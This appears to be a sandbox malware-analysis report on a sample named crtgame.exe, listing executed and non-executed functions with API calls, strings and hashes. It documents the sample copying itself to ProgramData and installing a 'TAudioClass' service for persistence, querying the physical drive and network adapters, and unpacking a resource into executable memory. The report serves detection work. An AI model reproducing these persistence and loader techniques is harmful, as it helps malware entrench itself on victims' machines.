String ID: /chk$C:\Program Files (x86)\CRTGame\crtgame.exe$Software\TLGraphicsMode$TAudioClass$TAudioClass$tac1210%d$test
API String ID: 99468869-594702758
Opcode ID: 1774414c222657f30e0ff0fda0a7ecf03fc2325e43c918c94e521cb7f69dc8be
Instruction ID: 4fae6dedbb5559179aee60a5bd746ea385fcb214e20c208df2d3a45f8cd54b52
Opcode Fuzzy Hash: 1774414c222657f30e0ff0fda0a7ecf03fc2325e43c918c94e521cb7f69dc8be
Instruction Fuzzy Hash: C76132B1940219BFEB10DBA19E4DFAE7BBCEB04349F104176B606F21D1D7789D148B68

Function 00402548 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 142
serviceregistryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,00000000,7622F360,00000000), ref: 00402582
GetModuleFileNameA.KERNEL32(00000000,?,?,?,00000000,7622F360,00000000), ref: 00402589
GetModuleHandleA.KERNEL32(00000000,00000208,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7622F360), ref: 004025EA
GetModuleFileNameW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7622F360,00000000), ref: 004025F1
RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,?), ref: 00402608
RegQueryValueExA.KERNELBASE(?,Common AppData,00000000,00000001,C:\ProgramData\TAudioClass\TAudioClass.exe,?), ref: 00402632
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7622F360,00000000), ref: 00402643
CreateDirectoryA.KERNELBASE(C:\ProgramData\TAudioClass\TAudioClass.exe,00000000), ref: 00402665
CopyFileA.KERNEL32(?,C:\ProgramData\TAudioClass\TAudioClass.exe,00000000), ref: 00402694
OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 004026A2
CreateServiceA.ADVAPI32(00000000,TAudioClass,TAudioClass,000F01FF,00000010,00000002,00000001,C:\ProgramData\TAudioClass\TAudioClass.exe,00000000,00000000,00000000,00000000,00000000), ref: 004026C3
CloseServiceHandle.ADVAPI32(00000000), ref: 004026D0
CloseServiceHandle.ADVAPI32(00000000), ref: 004026E4
CloseServiceHandle.ADVAPI32(00000000), ref: 004026E9

Strings

Common AppData, xrefs: 00402627
TAudioClass, xrefs: 00402654, 00402659, 00402676, 004026C0, 004026C1
C:\ProgramData\TAudioClass\TAudioClass.exe, xrefs: 0040256A, 00402570, 00402624, 0040264E, 0040265A, 00402664, 00402670, 00402677, 00402682, 00402692, 004026B4
.exe, xrefs: 0040267D
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004025FE

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: Handle$CloseModuleService$File$CreateNameOpen$CopyDirectoryManagerQueryValue
String ID: .exe$C:\ProgramData\TAudioClass\TAudioClass.exe$Common AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$TAudioClass
API String ID: 3461818117-1310459540
Opcode ID: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
Instruction ID: ab6d53e788ee7b1a4f89e64ab78f532d797b3e843243f72342cd50906d5f4c6a
Opcode Fuzzy Hash: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
Instruction Fuzzy Hash: A541B6B1940108BBEB20AB61DE4EE9F3B6DEF41745F00043AF601B11D2D7B95D509A7D

Function 00401B54 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B66
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B7D
GetAdaptersInfo.IPHLPAPI(?,00000400,00000000,00000000,00000000), ref: 00401BA6
FreeLibrary.KERNEL32(00401A3E), ref: 00401C24

Strings

GetAdaptersInfo, xrefs: 00401B77
o, xrefs: 00401BFB
iphlpapi.dll, xrefs: 00401B61

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: Library$AdaptersAddressFreeInfoLoadProc
String ID: GetAdaptersInfo$iphlpapi.dll$o
API String ID: 514930453-3667123677
Opcode ID: fe97a66bfe1a0e4a090fceeb56766dae8f1332a0d6ba4185a88c48e8e01133b6
Instruction ID: a5aee0b79a35ee34078b30f54a7b4ada864a53d9b06d06d0c5030cf98c67091c
Opcode Fuzzy Hash: fe97a66bfe1a0e4a090fceeb56766dae8f1332a0d6ba4185a88c48e8e01133b6
Instruction Fuzzy Hash: 3121A770944209AFDF21DBA5C9447EFBBB4EF41344F1440BAE504B22E1E7789A85CB69

Function 00401A58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000), ref: 00401A74
DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401ABB
GetLastError.KERNEL32 ref: 00401B17
CloseHandle.KERNELBASE(?), ref: 00401B46

Strings

\\.\PhysicalDrive0, xrefs: 00401A6C

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: CloseControlCreateDeviceErrorFileHandleLast
String ID: \\.\PhysicalDrive0
API String ID: 4026078076-1180397377
Opcode ID: 6658c9d09989f05e0195eaddce68eb37b9664083837fa87bf39f3550b185ff27
Instruction ID: 0eed0264e883c0688f73d788d7d0bd333b7eda35479a1ece95cf3a9209f64869
Opcode Fuzzy Hash: 6658c9d09989f05e0195eaddce68eb37b9664083837fa87bf39f3550b185ff27
Instruction Fuzzy Hash: 75315A71D01118AACB21EF96DD849EFBBB9EF40750F20817AE515B22A0E3785E45CF98

Function 00402F82 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32 ref: 00402FA8

Part of subcall function 004032BA: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FE1,00000000), ref: 004032CB
Part of subcall function 004032BA: HeapDestroy.KERNEL32 ref: 0040330A

GetCommandLineA.KERNEL32 ref: 00402FF6
GetStartupInfoA.KERNEL32(?), ref: 00403021
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00403044

Part of subcall function 0040309D: ExitProcess.KERNEL32 ref: 004030BA

Strings

x5r, xrefs: 00402FFC

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
String ID: x5r
API String ID: 2057626494-3113824860
Opcode ID: fc7c75a0fca1fc71633c191dac2b30b5283b5d3f62fb2d5ff47b98b0991d1776
Instruction ID: 9dac6a1a792168accaafc8f216740def6c4fb0c1b32456360c1ba9f1c8530c2f
Opcode Fuzzy Hash: fc7c75a0fca1fc71633c191dac2b30b5283b5d3f62fb2d5ff47b98b0991d1776
Instruction Fuzzy Hash: D4217CB1800714AADB04AFA6DE09A6E7BA9EB45315F10013EFA05BB2D1DB784810CB99

Function 00401C5B Relevance: 6.0, APIs: 4, Instructions: 37
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00401C74
CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 00401C95
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00401CA8
CloseHandle.KERNEL32(00000000), ref: 00401CB1

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: File$CloseCreateDirectoryHandleTimeWindows
String ID:
API String ID: 87451460-0
Opcode ID: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
Instruction ID: cc4b8a8173e68006100f6bb5cfe5cbca554eec38252bcd741f722b6c7c402e1e
Opcode Fuzzy Hash: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
Instruction Fuzzy Hash: 7CF0E27668021077E6209B359E8DFCB3AAD9BC6B60F010134BB46F21D0D6B49551C6B4

Function 004041DB Relevance: 4.5, APIs: 3, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,004041C6,?,00000000,00000000,00403059,00000000,00000000), ref: 004041EB
TerminateProcess.KERNEL32(00000000,?,004041C6,?,00000000,00000000,00403059,00000000,00000000), ref: 004041F2
ExitProcess.KERNEL32 ref: 0040426C

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
Instruction ID: 3c2d901587470c3af459565a9284c94394272298cc372ce865a47b82234f48c2
Opcode Fuzzy Hash: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
Instruction Fuzzy Hash: 7501D2B1648301DEDA10AF65FE44A0A7BB4FBD4391B11457FF241761E0C739A851CA2E

Function 004032BA Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FE1,00000000), ref: 004032CB

Part of subcall function 00403172: GetVersionExA.KERNEL32 ref: 00403191

HeapDestroy.KERNEL32 ref: 0040330A

Part of subcall function 00403317: HeapAlloc.KERNEL32(00000000,00000140,004032F3,000003F8), ref: 00403324

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
Instruction ID: 02f34df244f728f86bc68da1e651a6997b8534df00875083e7ca9fefff41b132
Opcode Fuzzy Hash: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
Instruction Fuzzy Hash: C1F06530554301A9EF201F305D8AB2A3DA89794757F14483BF881F91D1EF7D8A91950E

Non-executed Functions

Function 00402428 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75
registrysynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegisterServiceCtrlHandlerA.ADVAPI32(TAudioClass,Function_000023D3), ref: 00402436
SetServiceStatus.ADVAPI32(0040A058), ref: 00402495
GetLastError.KERNEL32 ref: 00402497
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004024A4
GetLastError.KERNEL32 ref: 004024C5
SetServiceStatus.ADVAPI32(0040A058), ref: 004024F5
CreateThread.KERNEL32(00000000,00000000,Function_00002351,00000000,00000000,00000000), ref: 00402501
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040250A
CloseHandle.KERNEL32 ref: 00402516
SetServiceStatus.ADVAPI32(0040A058), ref: 0040253F

Strings

TAudioClass, xrefs: 00402431

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
String ID: TAudioClass
API String ID: 3346042915-824782384
Opcode ID: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
Instruction ID: 7efe40ee76daeed059ea918d990e5cbaeb6ba916a4eee0f1f7423c99795c6411
Opcode Fuzzy Hash: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
Instruction Fuzzy Hash: 1321A9B0841348EBD2119F36FF48E177FA8EB96719715813AE505B22B0C7BA0464DF2E

Function 004058B7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 50
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D7D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 004058C9
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004058E1
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004058F2
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004058FF

Strings

user32.dll, xrefs: 004058C4
GetLastActivePopup, xrefs: 004058F4
GetActiveWindow, xrefs: 004058EC
MessageBoxA, xrefs: 004058DB
xe@, xrefs: 00405925, 00405929

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
API String ID: 2238633743-4073082454
Opcode ID: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
Instruction ID: 2d5919ac961fb8b47e5806104f76029f10fe1308888878a2fdfea3e3d59386dd
Opcode Fuzzy Hash: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
Instruction Fuzzy Hash: 4A017171640701EFC7109FB5AD8091B3BE8EA487A0711043FA105F23E2DA7988619F29

Function 00405B7F Relevance: 13.7, APIs: 9, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,00404EF3,00200020,00000000,?,00000000,00000000), ref: 00405BC1
LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,00404EF3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BDD
LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00404EF3,?,00000103,00000001,00000000,?,00404EF3,00200020,00000000,?,00000000,00000000), ref: 00405C26
MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404EF3,00200020,00000000,?,00000000,00000000), ref: 00405C5E
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404EF3,00200020,00000000,?,00000000), ref: 00405CB6
LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404EF3,00200020,00000000,?,00000000), ref: 00405CCC
LCMapStringW.KERNEL32(00000000,?,00404EF3,00000000,00404EF3,?,?,00404EF3,00200020,00000000,?,00000000), ref: 00405CFF
LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404EF3,00200020,00000000,?,00000000), ref: 00405D67

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 6fb03f0de8e14ffbba6d39a053688989b4d07ae79834ee937682c639a33d809c
Instruction ID: b71a23c0b73b48c52d5bda9799daf5958ca8c82b9c5fc6ae779467d82ee1466a
Opcode Fuzzy Hash: 6fb03f0de8e14ffbba6d39a053688989b4d07ae79834ee937682c639a33d809c
Instruction Fuzzy Hash: 6C514A31900609ABDF229F94DD49E9F7BB9EF48750F10812BF915B12A0D33A8960DF69

Function 00404C59 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404CC6
GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00404D9C
WriteFile.KERNEL32(00000000), ref: 00404DA3

Strings

<program name unknown>, xrefs: 00404CD6
Microsoft Visual C++ Runtime Library, xrefs: 00404D72
..., xrefs: 00404D18
Runtime Error!Program: , xrefs: 00404D2C

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
Instruction ID: dc6fb59b036afc32ad7d883685c443d86e427d7c65881978fb0b24905fa46ab3
Opcode Fuzzy Hash: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
Instruction Fuzzy Hash: C63192B2A00218AAEF20EA60DD49FDA376DEF85304F1005BBF545B61C1D6B8AE518A19

Function 00404770 Relevance: 12.1, APIs: 8, Instructions: 132COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403006), ref: 0040478B
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403006), ref: 0040479F
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403006), ref: 004047CB
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403006), ref: 00404803
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403006), ref: 00404825
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00403006), ref: 0040483E
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403006), ref: 00404851
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040488F

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
Instruction ID: b3dd828dc6d9f78d8a5ea985437d6bc406cb02d63f326d11a028c5d351c81a87
Opcode Fuzzy Hash: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
Instruction Fuzzy Hash: 2E31D0FB5042A56ED7207BB59C8483B769CE6C6358B158D3FF642F3380E6398C4186A9

Function 00401FFB Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,0000000A,00000000), ref: 00402011
GetLastError.KERNEL32 ref: 0040201D
SizeofResource.KERNEL32(00000000), ref: 0040202A
LoadResource.KERNEL32(00000000), ref: 00402044
LockResource.KERNEL32(00000000), ref: 0040204B
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402056
GetTickCount.KERNEL32 ref: 00402092
GlobalAlloc.KERNEL32(00000040,?), ref: 004020F8

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
String ID:
API String ID: 564119183-0
Opcode ID: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
Instruction ID: 5bb6e3aa1d8004c7212ec098650266c2412a7dfd0dc2f216cc67e198d7e8a746
Opcode Fuzzy Hash: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
Instruction Fuzzy Hash: 66313B71A003416FDF118BB99E48AAF7F78EF49344B10803AFA46F72C1D6748840C7A8

Function 004021C6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139librarysleepmemoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,762330D0), ref: 004021E3
GetLastError.KERNEL32 ref: 00402298
LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 004022A5
GetProcAddress.KERNEL32(?,?), ref: 004022E0
Sleep.KERNEL32(000003E8), ref: 00402336

Strings

(, xrefs: 0040225B

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: AddressAllocErrorLastLibraryLoadProcSleepVirtual
String ID: (
API String ID: 2871813557-3887548279
Opcode ID: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
Instruction ID: cf3737800172ba696e67f432db29e15671dddcf18138f746b38aebc0affdf460
Opcode Fuzzy Hash: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
Instruction Fuzzy Hash: AD518371A00215EFDB14CF98C984BAEB7B5FF44304F2480AAE905AB3C1D7B4EA51CB94

Function 00403B68 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403300), ref: 00403B89
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403300), ref: 00403BAD
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403300), ref: 00403BC7
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403300), ref: 00403C88
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403300), ref: 00403C9F

Strings

@q@, xrefs: 00403B75, 00403BD1, 00403BDA, 00403BE3, 00403C8E
@q@, xrefs: 00403BE8, 00403BF1, 00403BFA, 00403C02

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: AllocVirtual$FreeHeap
String ID: @q@$@q@
API String ID: 714016831-1591251108
Opcode ID: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
Instruction ID: bb2f25b3c446edc19c5578eb3fd2b922e436acdaef88fb0018a24f570b544f83
Opcode Fuzzy Hash: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
Instruction Fuzzy Hash: BB3105719447019FE3308F25DD45B26BBE8E748756F10423AE555FB3D0D778A9008B4D

Function 00405DCE Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,00404EF3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E0D
GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405E27
GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404EF3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E5B
MultiByteToWideChar.KERNEL32(00404EF3,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404EF3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E93
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405EE9
GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405EFB

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: 842452aa044ae0ef97ac5ad7deab647cbfc0197c5a7373b2729050aa298a8793
Instruction ID: 1ddadf124a6ca1b2ca8ea797e0c37c36c04b0ffb7962988f26068f32c671ff11
Opcode Fuzzy Hash: 842452aa044ae0ef97ac5ad7deab647cbfc0197c5a7373b2729050aa298a8793
Instruction Fuzzy Hash: EC416E7250060AAFCF119F94DD85EAF7B78EB04750F14443AFA12B2290D33989609F99

Function 00403172 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00403191
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004031C6
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403226

Strings

__MSVCRT_HEAP_SELECT, xrefs: 004031C1
__GLOBAL_HEAP_SELECTED, xrefs: 00403200

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
Instruction ID: 352fa3c33e130876c133b2754c5b4d876673d384c6c3ddc615f50f25897675de
Opcode Fuzzy Hash: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
Instruction Fuzzy Hash: 013113719012886EEB319B745C56ADA3F6C9B07709F2804FFE045F92C2D67D8F898B19

Function 004048A2 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 004048FB
GetFileType.KERNEL32(00000800), ref: 004049A1
GetStdHandle.KERNEL32(-000000F6), ref: 004049FA
GetFileType.KERNEL32(00000000), ref: 00404A08
SetHandleCount.KERNEL32 ref: 00404A3F

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
